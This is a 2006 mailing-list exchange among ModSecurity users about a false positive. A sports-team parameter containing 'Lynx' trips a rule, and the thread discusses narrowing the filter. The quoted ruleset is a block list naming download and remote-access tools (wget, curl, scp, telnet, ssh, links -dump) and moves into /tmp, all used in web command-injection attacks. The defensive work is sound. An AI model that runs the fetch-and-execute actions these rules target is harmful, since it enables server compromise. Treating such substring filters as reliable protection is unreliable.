Its not my intention to block user agents. Its my intention to block
the common attacks sent through as parameters. Please read the entire
post next time instead of paying attention to a single word. I made no
mention of blocking user agents as a client. I mentioned blocking the
use of lynx in the request as an attack without barring access to
pages that might conlict with the filter. In my opinion, blocking
access based on user agents is over doing it. You could block access
to a legitimate web spider. I wouldn't use it unless I found that some
comercial site scraper didn't allow the user agent to be changed
(which is 99% of the software out there anyways.)
Jamie
On 3/6/06, Linh Vu <vu...@ph...> wrote:
> You should be more specific with your filter rules. Use HTTP_USER_AGENT
> to block user agents instead of the very generic THE_REQUEST.
>
> Linh
>
> Jamie Krasnoo wrote:
>
> >I was going through the audit logs thismorning and found that a page
> >of a customer of mine was being blocked by mod_sec for no good reson
> >other than the fact that the parameters contained lynx (Ottawa-Lynx to
> >be exact). I doubt that there would be any other conflicts with linux
> >programs when it comes to sports teams. As you can see I modified the
> >rule for lynx to make sure it doesn't match a "-" in front of it. Am I
> >opening up my server to an attack if someone does somthing clever? How
> >would I make sure something doesn't get rejected if nothing malicous
> >was intended?
> >
> >Thanks,
> >
> >Jamie
> >
> >------------------------------------------------------------------------=
-------------------------------------------------------
> >
> > # Block various methods of downloading files to a server
> > SecFilterSelective THE_REQUEST "wget "
> > SecFilterSelective THE_REQUEST "[^-]lynx "
> > SecFilterSelective THE_REQUEST "scp "
> > SecFilterSelective THE_REQUEST "ftp "
> > SecFilterSelective THE_REQUEST "cvs "
> > SecFilterSelective THE_REQUEST "rcp "
> > SecFilterSelective THE_REQUEST "curl "
> > SecFilterSelective THE_REQUEST "telnet "
> > SecFilterSelective THE_REQUEST "ssh "
> > SecFilterSelective THE_REQUEST "echo "
> > SecFilterSelective THE_REQUEST "links -dump "
> > SecFilterSelective THE_REQUEST "links -dump-charset "
> > SecFilterSelective THE_REQUEST "links -dump-width "
> > SecFilterSelective THE_REQUEST "links http:// "
> > SecFilterSelective THE_REQUEST "links ftp:// "
> > SecFilterSelective THE_REQUEST "links -source "
> > SecFilterSelective THE_REQUEST "mkdir "
> > SecFilterSelective THE_REQUEST "cd /tmp "
> > SecFilterSelective THE_REQUEST "cd /var/tmp "
> > SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
> >
> >
> >-------------------------------------------------------
> >This SF.Net email is sponsored by xPML, a groundbreaking scripting langu=
age
> >that extends applications into web and mobile media. Attend the live web=
cast
> >and join the prime developer group breaking into this new coding territo=
ry!
> >http://sel.as-us.falkag.net/sel?cmd=3Dk&kid=110944&bid$1720&dat=121642
> >_______________________________________________
> >mod-security-users mailing list
> >mod...@li...
> >https://lists.sourceforge.net/lists/listinfo/mod-security-users
> >
> >
> >
>
>
> --
> -----------------------------------------------
> Linh Vu - Web/DB and Systems Support officer
> School of Physics, The University of Melbourne
> Office: 8344 8093 Email: vu...@ph...
> -----------------------------------------------
>
>
|
